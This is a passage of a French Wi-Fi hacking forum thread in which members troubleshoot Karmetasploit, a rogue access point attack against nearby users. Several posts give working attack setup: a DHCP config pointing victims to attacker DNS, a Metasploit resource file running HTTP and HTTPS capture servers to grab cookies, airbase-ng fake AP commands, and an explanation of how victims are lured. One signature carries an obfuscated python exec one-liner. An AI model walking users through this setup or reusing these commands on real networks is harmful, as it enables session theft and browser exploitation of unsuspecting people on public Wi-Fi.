Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#101 10-08-2010 13:27:16

Gregos90300
N00b
Inscription : 20-05-2010
Messages : 3

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bonjour,

D'orenavant j'arrive a me connecter au faux AP et il recupere toutes les données des sites, mais le fichier /pentest/wireless/karma..../evilap_eth.cap ne se crée pas...

D'ou cela peut-il venir?

Cordialement

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#102 22-01-2011 20:07:48

iautran
Membre Radioactif
Inscription : 01-07-2010
Messages : 85

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Salut à tous,

est-ce qu'il serait possible de demander à karmetasploit juste de récupérer les cookies de sites prédéfinis mais pas de lancer une attaque sur le PC avec Metasploit afin d'avoir un accès admin sur le poste ?

Thanks

Hors Ligne

#103 22-01-2011 20:20:00

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Non c'est pas obliger, tu peux modifier le script

Hors Ligne

#104 25-01-2011 23:10:06

iautran
Membre Radioactif
Inscription : 01-07-2010
Messages : 85

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Merci pour ta réponse Koala (désolé je n'avais pas recu la notification mail de ta réponse).

J'ai regardé dans karma.rc mais je n'ai rien vu pour empêcher le lancement de MSP (et donc juste avoir la redirection vers la liste de sites (pour lequel je cherche aussi le fichier))

J'ai regardé sur le wiki associé au script mais c'est plutôt super succinct.

Je continue mes recherches, merci

Hors Ligne

#105 02-02-2011 22:08:04

shurikeN
Membre Actif
Inscription : 27-03-2010
Messages : 43

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

alan-smithee a écrit :

Ensuite enregistrer les lignes suivantes

option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}

dans le fichier que vous allez créer  /msf3/dhcpd.conf

Désolé, mais j'ai du mal avec ce passage. Peut-on développer un peu plus la chose ?

Hors Ligne

#106 02-02-2011 22:15:58

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Le DHCP, c'est le système qui va attribuer automatiquement une adresse IP à tes victimes. C'est une étape critique, parce que si ça ne fonctionne pas ou mal la victime va se retrouver en "connectivité limitée ou inexistante" et laisser tomber l'affaire. Sans une IP valide, la victime ne saura rien faire sur le réseau donc il faut veiller à lui en donner une, compatible avec le reste du système smile

Seules la première et les 4 dernières lignes sont vraiment importantes (le reste c'est du détail) :
- domain-name, ça indique au client quel DNS il peut interroger pour résoudre les adresses. On le renvoie vers notre machine d'attaque, qui doit donc pouvoir à une requête DNS (et accessoirement,lui donner une fausse réponse pour le piéger). On pourrait aussi mettre un DNS public.
- le dernier bloc indique dans quelle plage on va attribuer les adresses (entre 10.0.0.100 et 10.0.0.254), le masque de sous-réseau (on s'en fout un peu de sa valeur, mais il faut qu'elle soit cohérente, ici c'est celle par défaut) et surtout le routeur qui indiquera à la victime vers où envoyer le trafic pour qu'il puisse "sortir". La dernière ligne est une répétition de la première, on pourrait s'en passer wink

Si tout fonctionne bien, la victime recevra automatiquement une IP dans la plage choisie, sur le même réseau que l'interface du RogueAP, et elle pourra accéder au net à travers la machine d'attaque, mission accomplie smile

Hors Ligne

#107 02-02-2011 22:46:49

shurikeN
Membre Actif
Inscription : 27-03-2010
Messages : 43

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Ah oui c'est plus clair là, en effet. Si tout ça marche, ça fait quand même peur. On est loin de se douter d'un truc pareil. Je me souviens de l'époque où j'étais tout heureux de voir un réseau WiFi ouvert à tous, je me disais : "liberté !" smile.

Ok, et quand alan-smithee explique "Ensuite enregistrer les lignes suivantes dans le fichier que vous allez créer  /msf3/dhcpd.conf", comment dois-je m'y prendre ?
Vraiment mes connaissances sont très limitées, pardonnez mon ignorance d’ignare smile

Dernière modification par shurikeN (02-02-2011 22:49:45)

Hors Ligne

#108 02-02-2011 23:09:50

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Ben c'est assez simple, tu crées un nouveau fichier dans le dossier /msf3/ que tu appelles dhcpd.conf et tu y colles le contenu mentionné smile
Si tu veux faire ça en console :

touch /msf3/dhcpd.conf
nano /msf3/dhcpd.conf
#coller le contenu
CTRL+O
CTRL+X

Ouais, c'est clair que maintenant, un réseau OPN c'est limite louche, heureusement que ce genre d'AP malicieux reste rare ! Bon, dans ce cas-ci ça va encore si je me souviens bien il affiche une page noire avec "loading" le temps qu'il pompe les cookies, donc c'est vite suspect. Mais c'est clair qu'il existe des techniques bcp plus discrètes (et vicieuses)... Et je suis content de faire partie des gens qui savent comment ça marche plutôt que de ceux qui subissent big_smile

Hors Ligne

#109 02-02-2011 23:42:12

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Mon dieu !
Voila un outil bien puissant. Qui finira dans de mauvaises mains.
Y-a t'il un moyen simple àmettre en place pour que le windows de Mme Michu évite cela ?

Ca me rappelle FireSheep cette histoire de cookies.
[small](ps : Ca me rappelle les crêpes de ce soir (Chandeleur oblige) ces cookies.)[/small]


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#110 21-09-2011 13:45:54

freekiss
Membre Indéboulonnable
Lieu : Belgique
Inscription : 07-09-2011
Messages : 108

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

super tutos, je pense que je ne l'avais pas encore lu celui la,
tres instructif, merci beaucoup Alan-smithéée.
Cordialement,
freekiss


Si j'étais un crapaud, je serais un backtractien, smile

Hors Ligne

#111 16-10-2011 08:03:28

ubuntrue
Membre Radioactif
Inscription : 18-08-2011
Messages : 85

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Salut, je ne comprends vraiment pas comment utiliser e magnifique outil ... je n'ai aucun dossier /msf3/, aucun dossier /pentest/exploist/framework3/ ( je n'ai que framework et framework2, même après msfupdate ) donc toutes les commandes lancees par le script renvoient no such file or directory.

Ah et j'oublie, j'ai aussi un

/var/state/dhcp/dhcpcd.lease : no such file or directory

( a note que je n'ai même pas de dossier /var/state/ ...)

Merci d'avance si vous pouvez m'éclairer ! J'utilise Backtrack 5 r1 64bits-gnome

Hors Ligne

#112 16-10-2011 13:24:49

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Ta fais un svn de metasploit?

Sinon tu peux utiliser karmetasploit comme ceci en ligne de commande:(lignes tirés d'un script dont je me sert sur unbutu)

cd /root/metasploit ;
xterm -hold -T "Meterpreter" -e ./msfconsole -r /root/chemin/du/fichier/grabdecookies.rc &> /dev/null &

Et dans grabdecookies.rc tu mets ça dedans:

use auxiliary/server/capture/http
set SRVPORT 80
set BGIMAGE /msf3/load.gif
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 8080
set BGIMAGE /msf3/load.gif
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 443
set BGIMAGE /msf3/load.gif
set SSL true
run
use auxiliary/server/capture/http
set SRVPORT 8443
set BGIMAGE /msf3/load.gif
set SSL true
run

REnds le éxécutable et vérifis qu'il n'y est pas de process qui bloquent les ports en question wink

Dernière modification par koala (16-10-2011 13:25:33)

Hors Ligne

#113 16-10-2011 16:15:48

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Ubuntrue, prends l'habitude de regarder la date à laquelle un sujet a été créé, ça donne une idée sur la pertinence des infos wink Ici, Alan-Smithee a posté ses commandes en 2008, donc il y a plus de 3 ans ! Depuis, BackTrack a connu 2 nouvelles versions majeures et Metasploit je n'en parle même pas...

Les infos les plus récentes que j'aie trouvées sont celles proposées par le tuto suivant (en anglais) :
--> Karmetasploit- Backtrack 5 Tutorial
Je viens de tester, les commandes sont quasi bonnes (attention que parfois le retour à la ligne a sauté), il faut juste installer le serveur dhcp (apt-get install dhcp3-server) et créer une interface mon0 avec airmon-ng plutôt que wifi0/ath0. Si j'ai le temps je ferai un tuto plus détaillé sur BT5.

Attention que dans dans sa version de base, c'est une attaque de brute : Karmetasploit intercepte tout le trafic sur le fake AP et lance tous les exploits imaginables sur le browser de la victime. C'est aussi assez flagrant parce que la page par défaut (noir avec "loading") ne fait pas sérieux, et qu'un antivirus normal devrait détecter les payloads assez facilement. Une attaque intéressante, mais qui demande un petit travail d'adaptation quand même smile

Hors Ligne

#114 17-10-2011 18:56:08

ubuntrue
Membre Radioactif
Inscription : 18-08-2011
Messages : 85

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Ok mais sans framework3 je fais quoi? ( aucun moyen de l'obtenir sad ), j'ai vu sur internet ( je sais plus ou ) que c'était un bug de backtrack 5 64 bits ( a paramment ).

Il me manque /pentest/exploits/framework3 or tout se passe la dedans et donc les commandes de ton tuto sont inutilisables sad.

Hors Ligne

#115 17-10-2011 19:13:34

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

As-tu fais un update de metasploit? apparemment il y a pas mal de bug sur cette version la, tente une update pour obtenir le framework

mkdir metasploit
svn co http://metasploit.com/svn/framework3/trunk/ metasploit/
cd metasploit
svn update
svn update metasploit

Sinon si tu rencontres d'autres problèmes voici une liste des bugs et leurs solution:


Bug et solution pour bactrack 5

Hors Ligne

#116 17-10-2011 19:25:48

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Depuis BT5-R1, le dossier s'appelle "/pentest/exploits/framework" et plus "framework3". De toute façon, dans les 2 cas ce n'est qu'un raccourci vers "/opt/framework/msf3" donc le nom importe peu wink

Si vraiment tu veux le "framework3", tu n'as qu'à taper les commandes suivantes :

mkdir /pentest/exploits/framework3/
ln -s /opt/framework/msf3/ /pentest/exploits/framework3/

Hors Ligne

#117 20-10-2011 19:39:24

ubuntrue
Membre Radioactif
Inscription : 18-08-2011
Messages : 85

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Ok merci ça marche smile.

Hors Ligne

#118 20-10-2011 23:13:14

Ronaldo17
Membre Radioactif
Inscription : 07-11-2010
Messages : 86

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

bonjour,

j'ai essayer mais voila ce que me donne l'execution du script.sh mais lorsque je regarde mais nouveau point-d'accès joignable il n'apparait toujours pas. Merci pour votre aide.

dhcpd: no process found
tcpdump: no process found
airbase-ng: no process found


Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
1031    dhclient3
2209    dhclient3
2860    dhclient
2878    dhclient
Process with PID 2209 (dhclient3) is running on interface wlan0


Interface    Chipset        Driver

wlan0        Realtek RTL8187L    rtl8187 - [phy0]
                (monitor mode enabled on mon1)
mon0        Realtek RTL8187L    rtl8187 - [phy0]

at0: ERROR while getting interface flags: No such device
SIOCSIFADDR: No such device
at0: ERROR while getting interface flags: No such device
SIOCSIFNETMASK: No such device
./script.sh: line 12: /var/state/dhcp/dhcpd.leases: No such file or directory
./script.sh: line 13: dhcpd: command not found
SIOCSIFMTU: No such device

Hors Ligne

#119 22-10-2011 01:47:40

Ronaldo17
Membre Radioactif
Inscription : 07-11-2010
Messages : 86

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

quelqu'un pour m'aider ?

Hors Ligne

#120 24-10-2011 02:34:40

Ronaldo17
Membre Radioactif
Inscription : 07-11-2010
Messages : 86

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

toujours pas ?

s'il vous plaît.

Hors Ligne

#121 24-10-2011 09:17:10

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Au risque de me répéter -->  Il n'y a pas si longtemps...

Ce script n'est pas prévu pour tourner sur BT5 donc c'est normal qu'il y aie des erreurs. De plus, c'est une attaque avancée qui demande d'avoir certaines notions pour régler les problèmes "simples" (ici, ton airbase-ng qui ne se lance pas est un problème "simple"). Tu peux essayer le lien que j'ai donné 7 posts plus haut, mais tu devras sans doute adapter l'une ou l'autre commande, ce n'est pas un tutoriel "je te prends par la main".

Au passage, quand tu parles d'un problème comme ça, essaye de donner un maximum de précisions, surtout sur un sujet qui date et qui comporte déjà 5 pages. "script.sh" je ne sais même pas duquel tu parles, et je n'ai pas envie de faire de la paléontologie pour trouver à quoi ça correspond. Si tu veux de l'aide, donne-nous un max d'info ce n'est pas à nous à les chercher wink

Hors Ligne

#122 28-10-2011 19:16:40

Ronaldo17
Membre Radioactif
Inscription : 07-11-2010
Messages : 86

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bonjour,

donc sur le tuto kermetasploit ou nous voyons:

[email protected]:~# airmon-ng
[email protected]:~# airmon-ng stop ath0
[email protected]:~# airmon-ng start wifi0
[email protected]:~# airbase-ng -P -C 30 -e "U R PWND" -v ath1

comment faire pour continuer car je travaille avec une vm et j'ai seulement mon wlan0 du coup j'ai pensé remplacer les ath0 et ath1 par mon0 et mon1 c'est bon ou pas ? car avec airbase-ng il m'indique que mon point d'accès est créer pourtant quand je scanne je ne vois toujours rien.

Merci

Hors Ligne

#123 27-12-2011 15:42:45

kader11000
Nouveau membre
Inscription : 16-12-2009
Messages : 7

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

salut tout le monde

chez moi ça ne marche pas ça démarre au bout d'une seconde ça me met

[email protected]:~/Desktop/fakeAP_pwn# bash fakeAP_pwn.sh
[*] fakeAP_pwn v0.3 (#101)
[>] Testing: Environment
[-] wlan1 isn't a wireless interface.
[i] Searching for a wireless interface
fakeAP_pwn.sh: line 440: [: wlan0: unary operator expected
[-] Couldn't find a wireless interface.

[i] *** BREAK ***
[>] Cleaning up
[*] Done! (= Have you... g0tmi1k?

bon j'ai une rtl8187 ce qu'il ya c'est que dans le fichier .sh il ya wireless interface wlan1

quand je fais un ifconfig

[email protected]:~/Desktop/fakeAP_pwn# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:df:dd:e6  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:49 errors:0 dropped:0 overruns:0 frame:0
          TX packets:20 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:4982 (4.9 KB)  TX bytes:2022 (2.0 KB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:644 errors:0 dropped:0 overruns:0 frame:0
          TX packets:644 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:100969 (100.9 KB)  TX bytes:100969 (100.9 KB)

wlan0     Link encap:Ethernet  HWaddr 00:c0:ca:23:b8:b6  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

pas de wlan1 svp vous pouvez m'aider ou m'orienter ??
je suis sous bt5 r1 avec vmwre

Dernière modification par kader11000 (27-12-2011 15:58:57)

Hors Ligne

#124 27-12-2011 16:36:56

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Ce script a été conçu pour BackTrack 3, et énormément de choses ont changé depuis lors du passage à BT4 puis 5. Il est normal que ce script ne fonctionne plus, et il est impossible de maintenir son support à moins de le réécrire en profondeur (ce que je n'ai pas l'intention de faire) wink

Tu peux essayer de remplacer tous les "wlan1" par "mon0" et voir si ça suffit, mais je doute... Il faudra aussi que tu installes le paquets dhcp3-server, peut-être d'autres aussi. Oui, ça s'annonce laborieux et j'espère que tu es motivé big_smile

Accessoirement, si tu avais lu le sujet avant de poser ta question tu aurais vu mon message (il y en a même 2 en fait) sur cette même page où j'explique que c'est normal si ça ne fonctionne pas roll J'y ai proposé un tuto pour BT5 (en anglais), tu peux essayer ça si tu veux.

Avant qu'on repose encore une fois la question :

*****

Non, ce script ne fonctionne pas avec BT4 ni BT5 ni BT5r1 et c'est NORMAL


*****

Hors Ligne

#125 27-12-2011 16:54:58

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Est ce que ce script fonctionne avec BT 5 ??

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.047 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]